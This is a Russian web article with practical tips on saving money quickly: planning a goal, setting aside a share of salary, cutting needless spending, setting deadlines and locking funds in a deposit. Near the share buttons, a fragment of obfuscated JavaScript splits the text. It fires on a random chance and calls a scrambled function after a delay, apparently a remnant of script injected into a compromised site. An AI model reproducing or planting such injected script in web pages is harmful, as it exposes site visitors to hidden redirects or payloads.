www.osnovosti.ru
smk-pride.ru

​Как быстро накопить деньги

3806c049
​Как быстро накопить деньги на мечту
У каждого есть мечта, но, для ее осуществления нужны ресурсы – деньги. Да, к сожалению, одними мыслями к мечте не придешь. Если вы хотите новый телефон, машину или поехать в Египет, вам потребуются средства. Конечно, можно влезть в долги и взять кредит в банке, а можно и собрать сумму самому. Мы расскажем вам, как быстро накопить деньги, и исполнить собственную мечту.

Составьте четкий план
Когда мы задаемся какой-либо целью, то стремимся к ней со всех сил. Но ошибка многих людей заключается в том, что они не знают до конца своих целей. Не знают, чего они в точности хотят. Типичный пример: «Я хочу на море». Это, конечно, хорошо, но следует определиться, куда конкретно на море, в какую страну, в какой город, когда, на сколько дней. Только в этом случае, человек ясно начинает понимать, чего он действительно хочет. Если дать вам один миллион долларов, и сказать, что вы получите деньги только тогда, когда распределите на бумаге каждую копейку, то это наверняка поставит вас в тупик. Как правило, фантазии у людей хватает только на несколько сотен тысяч и все. Это потому, что нет точной поставленной цели. Чтобы понять, как быстро накопить деньги, необходимо понимать, зачем они вам нужны.

Сколько откладывать
Итак, когда вы разобрались, зачем вам сумма, приступаем к их сбору. Существует несколько секретов. Первое правило – всегда с каждой зарплаты откладывайте 10% на «черный день», даже, если у вас нет конкретной цели. Когда она появится, то у вас будут определенные сбережения. Если же вы хотите быстро собрать деньги, то следует откладывать не менее 30% от зарплаты. Если вам не хватает оставшихся 70%, то можно поискать подработку, чтобы возместить.

Как высвободить нужные средства
Обязательно начните контролировать свои расходы. Человек очень много тратит денег на ненужные покупки. К примеру, захотелось вам напитка, вы пошли и купили, или же поели не дома, а в кафе, где та же картошка с котлетой стоит в несколько раз больше, чем вы могли бы позволить себе это дома. Как сэкономить деньги? Все просто: не покупайте то, без чего вы и так прекрасно обходитесь – конфеты, сникерсы, лишние вещи и прочий ненужный хлам. Тогда вы сможете значительно больше откладывать.

Но есть и регулярные затраты, которые следует учесть. Сюда относятся: платежи за квартиру, интернет; еда; одежда (только необходимая); расходы на транспорт; расходы на минимальные развлечения (чтоб от скуки не умереть); образование; непредвиденные обстоятельства. Еще 10% должно уходить в запас, и все это должна составлять ваша заработная плата.

Устанавливаем срок
Еще один вариант, который поможет понять, как быстро накопить деньги – это определиться, когда вам нужна сумма и сколько, поделить на оставшееся время, и строго откладывать ее, даже если вам не будет хватать на что-то минимальное. К примеру, вам необходимо собрать 10 000 рублей за 5 месяцев. Это говорит о том, что каждый месяц вы должны откладывать по 2 000 рублей минимум. Небольшая сумма, правда ли? А если вы надумаете не за 5 месяцев, а за один – то тут уже станет гораздо сложнее. Поэтому, четко определите сроки.

Избавляемся от соблазнов
Если вы заведете себе счет в банке, и будете на него делать платежи, то снять вы их не сможете до определенного момента, указанного в договоре. Таким образом, можно собрать большую сумму без риска брать оттуда «немножко» на расходы. Второй вариант – доверьте сумму близкому человеку, и вы не сможете ее потратить просто так.

Теперь вы знаете, как сэкономить деньги и быстро накопить на свою мечту. Главное – это научиться себе отказывать сейчас ради будущего, не тратить понапрасну и быть ответственным. Мечтайте и стремитесь к лучшему!

Share andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Twitter
  • Facebook
  • Яндекс.Закладки
  • Одноклассники

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.

Яндекс.Метрика